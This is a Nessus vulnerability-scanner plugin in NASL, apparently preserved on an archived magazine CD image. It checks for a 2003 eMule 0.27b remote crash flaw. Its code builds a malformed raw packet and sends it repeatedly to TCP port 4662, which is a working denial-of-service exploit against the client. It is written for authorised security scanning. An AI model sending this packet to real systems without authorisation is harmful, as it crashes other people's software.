home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / emule_dos.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  80 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. # Ref:
  7. #  Date: Tue, 25 Mar 2003 13:03:13 +0000
  8. #  From: Auriemma Luigi <aluigi@pivx.com>
  9. #  To: bugtraq@securityfocus.com
  10. #  Subject: Emule 0.27b remote crash
  11.  
  12. if(description)
  13. {
  14.  script_id(11473);
  15.  script_bugtraq_id(7189);
  16.  script_version ("$Revision: 1.3 $");
  17.  
  18.  
  19.  name["english"] = "EMule DoS";
  20.  script_name(english:name["english"]);
  21.  
  22.  desc["english"] = "
  23. It was possible to disable the remote EMule
  24. client by connecting to this port and sending 
  25. malformed data.
  26.  
  27. Solution : Upgrade to version 0.27c of EMule
  28. Risk factor : Medium";
  29.  
  30.  
  31.  
  32.  script_description(english:desc["english"]);
  33.  
  34.  summary["english"] = "Crashes the remote Emule client";
  35.  script_summary(english:summary["english"]);
  36.  
  37.  script_category(ACT_DENIAL);
  38.  
  39.  
  40.  script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison",
  41.         francais:"Ce script est Copyright (C) 2003 Renaud Deraison");
  42.  family["english"] = "Denial of Service";
  43.  family["francais"] = "DΘni de service";
  44.  script_family(english:family["english"], francais:family["francais"]);
  45.  script_require_ports(4662);
  46.  exit(0);
  47. }
  48.  
  49. #
  50. # The script code starts here
  51. #
  52.  
  53. port=4662;
  54.  
  55. if(get_port_state(port))
  56. {
  57.  soc = open_sock_tcp(port);
  58.  if(soc)
  59.  {
  60.    pkt = raw_string(
  61.    0xE3, 0x24, 0x00, 0x00, 0x00, 0x01, 0x10, 0x00, 0x00, 
  62.    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  63.    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  64.    0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0x00,
  65.    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  66.    0xE3, 0x03, 0x00, 0x00, 0x00, 0x4E, 0x00, 0x00);
  67.  
  68.   send(socket:soc, data:pkt);
  69.   close(soc);
  70.   
  71.   for(i=0;i<3;i++)
  72.   {
  73.    soc = open_sock_tcp(port);
  74.    if(!soc){ security_warning(port); exit(0); }
  75.    send(socket:soc, data:pkt);
  76.    close(soc);
  77.   }
  78.  }
  79. }
  80.